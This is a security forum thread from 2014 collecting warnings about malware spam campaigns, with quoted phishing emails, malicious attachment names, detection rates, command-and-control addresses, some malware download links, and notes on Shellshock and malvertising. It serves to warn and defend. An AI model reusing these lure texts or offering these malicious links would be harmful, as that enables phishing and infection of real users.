    29 September 2014: A Sales Invoice – By Account_SINV0612471.PDF.zip : Extracts to: A Sales Invoice – By Account_SINV0612471.xls.exe
    Current Virus total detections: 25/54* . This 'Your Invoice from Complete Office Solutions' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper excel XLS file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
    * https://www.virustotal.com/en/file/a...is/1411980639/
    ... Behavioural information
    TCP connections
    82.165.38.206: https://www.virustotal.com/en/ip-add...6/information/
    UDP communications
    137.170.185.211: https://www.virustotal.com/en/ip-add...1/information/
    ___

    Fake Bank SPAM - leads to malware
    - http://blog.dynamoo.com/2014/09/malw...cial-bank.html
    29 Sep 2014 - "Two -different- banking spams this morning, leading to the same malware:
    Lloyds Commercial Bank "Important - Commercial Documents"
    From: Lloyds Commercial Bank [secure@ lloydsbank .com]
    Date: 29 September 2014 11:03
    Subject: Important - Commercial Documents
    Important account documents
    Reference: C947
    Case number: 18868193
    Please review BACs documents.
    Click link below, download and open document. (PDF Adobe file) ...

    HSBC Bank UK "Payment Advice Issued"
    From: HSBC Bank UK
    Date: 29 September 2014 11:42
    Subject: Payment Advice Issued
    Your payment advice is issued at the request of our customer. The advice is for your reference only.
    Please download your payment advice at ...


    The link in the email goes through a script and then downloads a file document_8641_29092014_pdf.scr (this time without a ZIP wrapper) which has a VirusTotal detection rate of just 1/55*. The Anubis report shows that the malware attempts to phone home to cuscorock .com which is probably a good thing to -block- or monitor."
    * https://www.virustotal.com/en-gb/fil...e28b/analysis/
    ... Behavioural information
    DNS requests
    cuscorock .com (184.154.253.181)
    formatech .es (81.88.48.71)
    TCP connections
    184.154.253.181: https://www.virustotal.com/en/ip-add...1/information/
    81.88.48.71: https://www.virustotal.com/en/ip-add...1/information/
    188.165.198.52: https://www.virustotal.com/en/ip-add...2/information/
    ___

    Fake Order SPAM
    - http://myonlinesecurity.co.uk/order-...61864-malware/
    29 Sep 2014 - "'Order statsus: Order confirmation: 9618161864' coming from random names at random companies is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Lots of different subjects for this email . All subjects have a random number involved and some have bad spelling mistakes, including:
    - Order statsus: Order confirmation: 9618161864
    - Order info: 32257958734
    - Payment status: 93612666937
    - Payment info: 21714421631
    - Payment confirmation: 27863161481
    The email looks like ( slightly different versions all with different names and phone numbers and companies):
    Greetings,
    Your order #9618161864 will be shipped on 01.10.2014.
    Date: September 29, 2014. 12:12pm
    Price: £156.77
    Transaction number: 9AECB76F37D22F21
    Please find the detailed information on your purchase in the attached file order_2014_09_29_9618161864.zip
    Kind regards,
    Sales Department
    Tiana Haggin ...


    Date: order_2014_09_29_9618161864.zip: Extracts to: sale_2014_09_29_73981861092.exe
    Current Virus total detections: 3/55* . This 'Order statsus: Order confirmation: 9618161864' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a file with a red £ sign icon, that makes you think it is a proprietary invoice instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
    * https://www.virustotal.com/en/file/2...is/1411991708/
    ... Behavioural information
    TCP connections
    213.186.33.19: https://www.virustotal.com/en/ip-add...9/information/
    23.62.99.24: https://www.virustotal.com/en/ip-add...4/information/
    213.186.33.4: https://www.virustotal.com/en/ip-add...4/information/
    ___

    More Fake Voicemail SPAM - fake wav malware
    - http://myonlinesecurity.co.uk/new-vo...e-wav-malware/
    29 Sep 2014 - "'New Voicemail Message SUY-301' coming form random email addresses is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    The Voice Mail message has been uploaded to the following web
    address ...
    You can play this Voice Mail on most computers.
    Please do not reply to this message. This is an automated message which
    comes from an unattended mailbox.
    This information contained within this e-mail is confidential to, and is
    for the exclusive use of the addressee(s).
    If you are not the addressee, then any distribution, copying or use of this
    e-mail is prohibited.
    If received in error, please advise the sender and delete/destroy it
    immediately.
    We accept no liability for any loss or damage suffered by any person
    arising from use of this e-mail.


    ... the link in the email is broken because the idiots who crafted the email messed up, the formatting. There are literally hundreds of these emails and almost all of them have a different link address and a different set of letters and numbers...
    29 September 2014: voice448705888444.zip: Extracts to: voice448705888444.scr
    Current Virus total detections: 1/55* . This 'New Voicemail Message SUY-301' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper wav ( sound) file instead of the .scr file it really is, so making it much more likely for you to accidentally open it and be infected..."
    * https://www.virustotal.com/en/file/4...is/1412003182/
    ___

    'Mailbox Has Exceeded The Storage Limit' - Phish ...
    - https://blog.malwarebytes.org/fraud-...e-limit-phish/
    Sep 29, 2014 - "Be wary of emails claiming you’ve gone over your email storage limit – users of both AOL and Outlook are reporting the following poorly written message crashing their mailbox party in the last couple of days:
    “Kindly Re-Validate Your Mailbox
    Your mailbox has exceeded the storage limit is 1 GB, which is defined by the administrator, are running at 99.8 gigabytes, you can not send or receive new messages until you re-validate your mailbox.
    To renew the mailbox,
    click link below: [removed]
    Thank you!
    Web mail system administrator!
    WARNING! Protect your privacy. Logout when you are done and completely
    exit your browser.”


    The URL given on the Facebook post is already -dead- but it’s likely the people behind this have mails targeting other types of account and deploying multiple phish page links. In both examples, the scammers are using free AOL mail addresses – despite claiming to be from 'The Outlook Team' – which should raise a few red flags. AOL have confirmed the mail is a -hoax- and recipients should safely deposit it in their Trash folder..."
    ___

    Bash Bug vulnerability
    - http://www.symantec.com/connect/blog...-vulnerability
    Updated: 29 Sep 2014 - "... There are limited reports of the vulnerability being used by attackers in-the-wild. Proof-of-concept scripts have already been developed by security researchers. In addition to this, a module has been created for the Metasploit Framework, which is used for penetration testing...
    How a malicious command can be tacked-on to the end of a legitimate environment variable. Bash will run the malicious command first
    > http://www.symantec.com/connect/site...m-600px_v2.png
    ... Consumers are advised to apply patches to routers and any other web-enabled devices as and when they become available from vendors. Users of Apple’s Mac OS X should be aware that the operating system currently ships with a vulnerable version of Bash. Mac users should apply any patches for OS X when they become available..."

    Table of C&C Servers:
    - http://blog.trendmicro.com/trendlabs...9/Table-01.jpg

    89.238.150.154: https://www.virustotal.com/en/ip-add...4/information/
    108.162.197.26: https://www.virustotal.com/en/ip-add...6/information/
    162.253.66.76: https://www.virustotal.com/en/ip-add...6/information/
    213.5.67.223: https://www.virustotal.com/en/ip-add...3/information/

    Last edited by AplusWebMaster; 2014-09-29 at 22:19.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  7. #537
    Adviser Team AplusWebMaster's Avatar
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,881

    Thumbs down Fake NatWest, new FAX, Delta Air SPAM

    FYI...

    Fake NatWest, new FAX SPAM
    - http://blog.dynamoo.com/2014/09/malw...-have-new.html
    30 Sep 2014 - "The daily mixed spam run has just started again, these two samples seen so far this morning:

    NatWest: "You have a new Secure Message"
    From: NatWest [secure.message@ natwest .com]
    Date: 30 September 2014 09:58
    Subject: You have a new Secure Message - file-3800
    You have received a encrypted message from NatWest Customer Support
    In order to view the attachment please open it using your email client ( Microsoft Outlook, Mozilla Thunderbird, Lotus )
    Please download your ecnrypted message at ...

    "You've received a new fax"
    From: Fax [fax@victimdomain .com]
    Date: 30 September 2014 09:57
    Subject: You've received a new fax
    New fax at SCAN4148711 from EPSON by https ://victimdomain .com
    Scan date: Tue, 30 Sep 2014 14:27:24 +0530
    Number of pages: 2
    Resolution: 400x400 DPI
    You can secure download your fax message at ...


    The link in the email goes through a script to ensure that you are using a Windows PC and then downloads a file document3009.zip which contains a malicious executable document3009.scr which has a VirusTotal detection rate of 3/54*. The Comodo CAMAS report and Anubis report are rather inconclusive."
    * https://www.virustotal.com/en/file/1...is/1412070442/
    ... Behavioural information
    DNS requests
    maazmedia .com (69.89.22.130)
    TCP connections
    188.165.198.52: https://www.virustotal.com/en/ip-add...2/information/
    69.89.22.130: https://www.virustotal.com/en/ip-add...0/information/
    ___

    Fake Delta Air SPAM - word doc malware
    - http://myonlinesecurity.co.uk/delta-...d-doc-malware/
    30 Sep 2014 - "'Delta Air Thank you for your order' being sent to bookings@ uktservices .com and BCC copied to you pretending to come from Delta Air <login@ proche-hair .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    Order Notification,
    E-TICKET NUMBER / ET-98191471
    SEAT / 79F/ZONE 1
    DATE / TIME 2 OCTOBER, 2014, 11:15 PM
    ARRIVING / Berlin
    FORM OF PAYMENT / XXXXXX
    TOTAL PRICE / 214.61 GBP
    REF / OE.2368 ST / OK
    BAG / 3PC
    Your electronic ticket is attached to the letter as a scan document.
    You can print your ticket.
    Thank you for your attention.
    Delta Air Lines.


    30 September 2014: ET-17843879.zip: Extracts to: DT-ET_5859799188.exe
    Current Virus total detections: 4/55* . This 'Delta Air Thank you for your order' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper Microsoft word .doc file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
    * https://www.virustotal.com/en/file/3...is/1412075964/

    Last edited by AplusWebMaster; 2014-09-30 at 15:51.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  8. #538
    Adviser Team AplusWebMaster's Avatar
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,881

    Thumbs down Fake Police 'Suspect', Invoice SPAM

    FYI...

    Fake Police 'Suspect' SPAM
    - http://blog.dynamoo.com/2014/10/homi...tant-spam.html
    1 Oct 2014 - "... the New York City police have finally tracked me down for eviscerating that spammer in Times Square.
    From: ALERT@ police .uk [ALERT@ police-uk .com]
    Date: 1 October 2014 08:49
    Subject: Homicide Suspect - important
    Bulletin Headline: HOMICIDE SUSPECT
    Sending Agency: New York City Police
    Sending Location: NY - New York - New York City Police
    Bulletin Case#: 14-49627
    Bulletin Author: BARILLAS #1264
    Sending User #: 56521
    APBnet Version:
    The bulletin is a pdf file. To download please follow the link below ...


    Weirdly, the message comes from a police .uk email address and the link goes to a driving school in Australia. And it comes from 63.234.220.114 which is an IP address in Kansas City. Perhaps the biggest anomaly is the file that is downloaded, a ZIP file called file-viewonly7213_pdf.zip which contains an executable file-viewonly7213_pdf.scr which is (as you might guess) malicious with a VirusTotal detection rate of 2/55*. The Anubis report** shows that the malware phones home to santace .com which is probably worth blocking or monitoring. Other analyses are pending. I've also seen the same payload promoted through a "You've received a new fax" spam, and no doubt there will be others during the course of the day."
    * https://www.virustotal.com/en/file/5...is/1412150049/

    ** https://anubis.iseclab.org/?action=r...da&format=html
    ___

    Something evil on 87.118.127.230
    - http://blog.dynamoo.com/2014/10/some...118127230.html
    1 Oct 2014 - "... what exploit kit this is I cannot determine, but there's something evil on 87.118.127.230 (Keyweb, Germany) which is using hijacked GoDaddy-registered subdomains to distribute crap. It's definitely worth -blocking- this IP. The source looks like some sort of malvertising, but I have incomplete data..."

    87.118.127.230: https://www.virustotal.com/en/ip-add...0/information/
    ___

    Fake 'Booking Cancellation' SPAM
    - http://blog.dynamoo.com/2014/10/ukts...cellation.html
    1 Oct 2014 - "... a -mass- of these purporting to be from uktservices .com ("UK Travel Services"), but in fact it is a -forgery- and does -not- come from them at all - they are -not- responsible for sending the spam and their systems have -not- been compromised.
    From: email@ uktservices .com
    Date: 1 October 2014 14:01
    Subject: Booking Cancellation
    Hello.
    Your booking at 13:15 on 1st Oct 2014 has been Cancelled.
    Here is a link to your updated bookings view...


    All the emails are somewhat mangled, but the first link in the email (not the uktservices .com link) goes to what appears to be an exploit kit... In -all- cases, those pages forward to a malicious page at: [donotclick]37.235.56.121 :8080/njslfxqqw9. The IP of 37.235.56.121 belongs to EDIS GmbH in Austria, and I suspect it has been hacked through an insecure Joomla installation. I haven't been able to identify which exploit kit it is as it it has been hardened against analysis, but you can guarantee that this -is- malicious in some way or another..."

    37.235.56.121: https://www.virustotal.com/en/ip-add...1/information/
    ___

    More Fake Invoice SPAM
    - http://myonlinesecurity.co.uk/invoic...e-pdf-malware/
    1 Oct 2014 - "'Invoice 08387 from Them Digital' pretending to come from Jason Willson <jason@ themdigital .co.uk> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

    Screenshot: http://myonlinesecurity.co.uk/wp-con...ital_email.png

    There are actually about 15 different sizes and repackaged versions of this malware that I have seen so far today. All have the same zip file name but the contents inside are named differently, Some will be caught by antivirus generic detections and some won’t, so be careful & watch out. Use your eyes and intuition and don’t rely on yoiur antivirus to protect you from these types of malware
    Todays Date: Them Digital Invoice 08387.pdf.zip: Extracts to: ThemDigital_Invoice_42559029506452623.pdf.exe | Current Virus total detections: 9/55**. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
    * https://www.virustotal.com/en/file/6...is/1412153387/
    ___

    Fake 'Cashbuild Copied invoices' SPAM - PDF malware
    - http://myonlinesecurity.co.uk/cashbu...e-pdf-malware/
    1 Oct 2014 - "'Cashbuild Copied invoices' pretending to come from billing@ cashbuild .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:

    get copies of invoices. We will not be able to pay them. Please send clear invoices

    1 October 2014: copies_908705.zip ( 10kb): Extracts to: copies_908705.exe
    Current Virus total detections: 0/55* This Cashbuild Copied invoices is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
    * https://www.virustotal.com/en/file/8...is/1412156828/
    ___

    GNU bash vulns...
    - http://www.securitytracker.com/id/1030890
    Updated: Oct 3 2014*
    Original Entry Date: Sep 24 2014
    - https://web.nvd.nist.gov/view/vuln/d...=CVE-2014-6271 - 10.0 (HIGH)
    - https://web.nvd.nist.gov/view/vuln/d...=CVE-2014-6277 - 10.0 (HIGH)
    - https://web.nvd.nist.gov/view/vuln/d...=CVE-2014-6278 - 10.0 (HIGH)
    - https://web.nvd.nist.gov/view/vuln/d...=CVE-2014-7169 - 10.0 (HIGH)
    - https://web.nvd.nist.gov/view/vuln/d...=CVE-2014-7186 - 10.0 (HIGH)
    - https://web.nvd.nist.gov/view/vuln/d...=CVE-2014-7187 - 10.0 (HIGH)
    * ... archive entries have one or more follow-up message(s)...
    ___

    DoubleClick abused - malvertising
    - https://blog.malwarebytes.org/malver...ising-attacks/
    30 Sep 2014 - "Last week we uncovered a large-scale malvertising* attack involving Google’s DoubleClick and Zedo that affected many high-profile sites**... another incident where DoubleClick is part of the advertising chain has happened again... the publisher is trusting them to only allow ‘clean’ ads. Many popular sites were caught in the cross-fire including examiner . com... they can be widespread in an instant by leveraging the advertising networks’ infrastructure. Malicious ads are displayed to millions of visitors who do -not- actually need to click them to get infected:
    > https://blog.malwarebytes.org/wp-con...9/overview.png
    ... Flash-based redirection: ad looks legit but hides a silent -redirection- to an exploit page. Once again, no user interaction is required to trigger the -redirection- and anyone running an outdated Flash plugin is at risk of getting exploited... It is the infamous CryptoWall*** (hat tip @kafeine) ransomware that encrypts your files and demands a ransom..."
    * https://blog.malwarebytes.org/malver...lick-and-zedo/

    ** https://blog.malwarebytes.org/exploi...ael-newspaper/

    *** https://www.virustotal.com/en/file/5...is/1412048718/

    Last edited by AplusWebMaster; 2014-10-04 at 20:55.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  9. #539
    Adviser Team AplusWebMaster's Avatar
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,881

    Thumbs down Fake invoice, lawyer SPAM

    FYI...

    Fake Invoice SPAM - XLS malware
    - http://myonlinesecurity.co.uk/invoic...e-xls-malware/
    2 Oct 2014 - "'Invoice IDS107587_815' pretending to come from billing department at random companies is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

    Screenshot: http://myonlinesecurity.co.uk/wp-con...107587_815.png

    This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper Microsoft excel XLS file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
    ___

    Fake lawyer SPAM - PDF malware
    - http://myonlinesecurity.co.uk/docume...e-pdf-malware/
    2 Oct 2014 - "'document from lawyer' pretending to come from random names at yahoo .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... There are a multitude of similar type subjects with this one including:
    document from lawyer
    resend the fax
    document’s from lawyer
    document review
    notarized document from lawyer


    The document from lawyer email is very plain and simple and has a very simple 2 or 3 word content in bold: 'Document Review Lawyer' or document 'review consultant' or 'The law firm' and it attaches a file that pretends to be a copy of a fax...
    2 October 2014: facsimile_page2_10.02.2014.zip: Extracts to: facsimile_page2_10.02.2014.exe
    Current Virus total detections: 5/55* . This 'document from lawyer' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
    * https://www.virustotal.com/en/file/4...is/1412241170/
    ___

    Fake 'Shipping' SPAM - .scr malware
    - http://myonlinesecurity.co.uk/po-948...pping-malware/
    2 Oct 2014 - "'PO-94864-PM Shipping' pretending to come from somebody called Leta Potts is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email has 2 different versions of the text, depending on whether you read emails in full html when they can show pictures and formatting or in plain text... The email plain text version looks like:
    Hi April,
    PO-61814-PM is ready to ship. Attached please find the receipt and UPS tracking is below.
    UPS Tracking Number: 1ZY79R600397981039
    Thank you and have a wonderful afternoon.
    Amy Fling
    Pro Shoe Covers
    503-807-1642
    800-978-1786
    www. ProShoeCovers .com
    129 Pendleton Way, #31
    Washougal, WA 98671
    OMWBE Certified
    Women’s Business Enterprise ...


    The html version looks like:
    April,
    Please see attached draw. Thanks
    Leta Potts
    Conquest Electrical Contracting, LLC
    Owner/Operator
    12307 Roxie Drive, Ste. 215
    Austin, TX 78729
    Cell 925 487-5121
    Office 925 524-2651 ...


    2 October 2014: docs100214.zip - Extracts to: mydocs.scr
    Current Virus total detections: 0/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a icon of a blue folder with a silver key instead of the .scr file it really is, so making it much more likely for you to accidentally open it and be infected..."
    * https://www.virustotal.com/en/file/f...is/1412253608/

    - http://www.ehow.com/info_8510148_scr-file.html
    "... Viruses and other malicious software may be installed in SCR files, as the file type is -executable- or capable of installing code..."
    ___

    Fake insurance photos SPAM - malware
    - http://myonlinesecurity.co.uk/fwd-ph...mpany-malware/
    2 Oct 2014 - "'Fwd: Photos from the insurance company' coming from random names ands email addresses, most pretending to come from somebody @ntlworld .com is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email has a totally -blank- body with just the attachment named photo1.zip and subject of Fwd: Photos from the insurance company . It is exactly the -same- malware as in today’s document from lawyer* – fake PDF malware but instead of a fake fax it unzips to a pif file ( windows shortcut). This Fwd: Photos from the insurance company is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
    * http://myonlinesecurity.co.uk/docume...e-pdf-malware/
    ___

    Fake 'eDocument' SPAM – PDF malware
    - http://myonlinesecurity.co.uk/santan...e-pdf-malware/
    2 Oct 2014 - "'New eDocument arrived' pretending to come from e-Documents@ santander .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

    Screenshot: http://myonlinesecurity.co.uk/wp-con..._statement.png

    ... the malware is the -same- as in today’s 'document from lawyer'* – fake PDF malware. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
    * http://myonlinesecurity.co.uk/docume...e-pdf-malware/
    ___

    O/S Market Share - Sep 2014:
    - http://www.netmarketshare.com/operat...10&qpcustomd=0
    ['Still more XP users than Vista, Win8, and Win8.1 combined]
    ___

    Fake invoice SPAM
    - http://blog.mxlab.eu/2014/10/02/fake...ntains-trojan/
    2 Oct 2014 - "... intercepted 2 trojan distribution campaigns by email.
    Unpaid invoice notification
    The first campaign has the following details:
    [IMPORTANT] Unpaid invoice notification
    [IMPORTANT] Latest letter on invoice overdue
    Final letter before commencing legal action
    Latest invoice
    Latest letter on invoice overdue
    Recent invoice


    This email is sent from a spoofed addresses and has the following body below. In the email, the amount that is due is specified in the GBP currency but no company or service is included in the message...
    We are writing to you about fact, despite previous reminders, there remains an outstanding amount of GBP 234.60 in respect of the invoice(s) contained in this email . This was due for payment on 26 September, 2014.
    Our credit terms stipulate full payment within 3 days and this amount is now 14 days overdue.The total amount due from you is therefore GBP 340.51
    If the full amount of the sum outstanding, as set above, is not paid within 7 days of the date of this email, we shall begin legal action, without warning, for a court order requiring payment. We may also commence insolvency proceedings. Legal proceedings can affect any credit rating. The costs of legal proceedings and any other amounts which the court orders must also be paid in addition to the debt.
    This letter is being sent to you in accordance with the Practice Direction on Pre-Action Conduct (the PDPAC) contained in the Civil Procedure Rules, The court has the power to sanction your continuing failure to respond.
    You can find the original invoice in attachment below...


    The attached ZIP file name is in the format like Copy4167506/9332.zip and contains the 89 kB large file Invoice_815992488951.xls.scr. The trojan is known as HEUR/QVM20.1.Malware.Gen. At the time of writing, 1 of the 54 AV engines did detect the trojan at Virus Total*...
    * https://www.virustotal.com/en/file/e...is/1412243475/

    The 2nd campaign has the following details: This email is sent from the spoofed addresses like “Harrison Andrews , Billing Dept” <049aaa@***** .pl> and has the following body:
    This email contains an invoice ID:P198150_874 file attachment.
    Yours faithfully,
    Harrison Andrews , Department CCD


    The attached ZIP file name is in the format like P198150_874.zip and contains the 89 kB large file Invoice_33618247236242544.xls.scr. The trojan is known as HEUR/QVM20.1.Malware.Gen. At the time of writing, 1 of the 54 AV engines did detect the trojan at Virus Total**..."
    ** https://www.virustotal.com/en/file/3...cefa/analysis/

    Last edited by AplusWebMaster; 2014-10-02 at 22:30.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  10. #540
    Adviser Team AplusWebMaster's Avatar
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,881

    Thumbs down Fake Adobe, Personal reply, Transactions Report, Dropbox malSPAM

    FYI...

    Fake 'Transactions Report' SPAM - fake PDF malware
    - http://myonlinesecurity.co.uk/alert-...e-pdf-malware/
    3 Oct 2014 - "'Alert Transactions Report by users from 2014-09-28 to 2014-09-28' pretending to come from Tech Server is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email is very terse and basic with a simple one line content:

    Your requested report is attached here...

    3 October 2014: transact_store.zip: Extracts to: transact_e5ebfdsd621.exe
    Current Virus total detections: 2/54* . This is the same malware that is being dropped by today’s version of http://myonlinesecurity.co.uk/new-photo-malware/
    This 'Alert Transactions Report by users from 2014-09-28 to 2014-09-28' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
    * https://www.virustotal.com/en/file/e...is/1412331282/
    ___

    Fake 'shopping' malSPAM spreads via Dropbox
    - http://blog.dynamoo.com/2014/10/than...-us-today.html
    3 Oct 2014 - "This spam email leads to malware hosted on Dropbox:
    From: pghaa@ pghaa .org
    To: victim@ victimdomain .com
    Date: 3 October 2014 11:43
    Subject: victim@ victimdomain .com
    Thanks for shopping with us today! Your purchase will be processed shortly.
    ORDER DETAILS
    Purchase Number: CTV188614791
    Purchase Date: 7:38 2-Oct-2014
    Customer Email: victim@ victimdomain .com
    Amount: 4580 US Dollars
    Open your payment details
    Please click the link provided above to get more details about your order...


    In this case the download location is https ://www .dropbox .com/s/7n4ib0ysqnzr4un/Payment%20Details_52375.zip?dl=1 although it is likely that there are others. The download file is Payment Details_52375.zip containing a malicious executable PAYMENT DETAILS.PDF .scr_56453.exe which has a VirusTotal detection rate of 5/55*. At the moment, automated analysis tools are inconclusive as to what it does.
    UPDATE: it is also being distributed via
    [donotclick]
    https ://www .dropbox .com/s/9an3ggp98xu7ql5/Transaction_85523.zip?dl=1
    https ://www .dropbox .com/s/8uoheamseo98nse/Information_J90Z4.zip?dl=1"
    * https://www.virustotal.com/en-gb/fil...is/1412334793/
    ___

    Fake 'Personal reply' SPAM - Word doc malware
    - http://myonlinesecurity.co.uk/re-per...d-doc-malware/
    3 Oct 2014 - "'Re: Personal reply id 509359' coming from random email addresses is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

    Screenshot: http://myonlinesecurity.co.uk/wp-con...fice_macro.png

    3October 2014: Reply02.doc . Current Virus total detections: 4/55*
    Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day..."
    * https://www.virustotal.com/en/file/7...is/1412314059/
    ___

    Fake 'Adobe invoice' SPAM...
    - http://blog.mxlab.eu/2014/10/02/mali...rvice-invoice/
    Oct 2, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Adobe Invoice”. This email is send from the spoofed address “Adobe Billing <billing@ adobe .com>” and has the following body:
    Dear Customer,
    Thank you for signing up for Adobe Creative Cloud Service.
    Attached is your copy of the invoice.
    Thank you for your purchase.
    Thank you,
    The Adobe Team
    Adobe Creative Cloud Service


    Screenshot: http://img.blog.mxlab.eu/2014/20141002_adobe.gif

    The attached file is 42 kB large and has the name Adobe Invoice.doc. The trojan is known as W97M.Dropper.F, VBA/TrojanDownloader.Agent.AZ, MSOffice/Agent!tr or Win32.Trojan.Macro.Dxmz. At the time of writing, 4 of the 55 AV engines did detect the trojan at Virus Total*..."
    * https://www.virustotal.com/en/file/5...f3f5/analysis/
    ___

    Shellshock in-the-wild - drops malware
    - http://community.websense.com/blogs/...erability.aspx
    1 Oct 2014 - "Since the Shellshock vulnerability became public knowledge... vulnerability being exploited in the wild to drop malware...
    Backdoors and Bot Nets: The observed malware found to be exploiting the Shellshock vulnerability has been dropped by various command and control (C&C) servers... The malware has the following capabilities:
    - A Linux backdoor, capable of DDoS attacks, brute force attacks on passwords, and receiving commands to execute from its C&C server.
    - A Perl IRC bot, typically capable of DDoS attacks and spreading itself by looking for exploitable servers using various vulnerabilities, such as remote file inclusion exploits.
    The malware has been seen to be downloaded to a compromised machine by exploiting the Shellshock vulnerability and invoking commands such as "curl" or "wget," and then executing the malicious payload. To date, we have seen -4- variants of the Linux backdoor and several versions of the Perl-based IRC bot.
    Popularity Since Vulnerability Disclosure: The following domains and IPs have been found to be used as command & control (C&C) points for this campaign (amongst others):
    208.118.61.44: https://www.virustotal.com/en/ip-add...4/information/
    27.19.159.224: https://www.virustotal.com/en/ip-add...4/information/
    89.238.150.154: https://www.virustotal.com/en/ip-add...4/information/
    212.227.251.139: https://www.virustotal.com/en/ip-add...9/information/
    ... We have seen C&C traffic to these IPs in the last 2 -months- showing that they have been used for malicious and bot network campaigns -prior- to the Shellshock vulnerability disclosure. In fact, going back as far as 2012, we see that one such C&C was used in a Point-of-Sale malware campaign known as 'vSkimmer'. More recently, we have observed it serving up an IRC bot... Experience has taught us that as cyber-criminals zoom in on the vulnerable code branch, -additional- vulnerabilities are likely to surface..."

    - http://atlas.arbor.net/briefs/index#1914014714
    Extreme Severity
    3 Oct 2014

    Last edited by AplusWebMaster; 2014-10-04 at 19:05.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •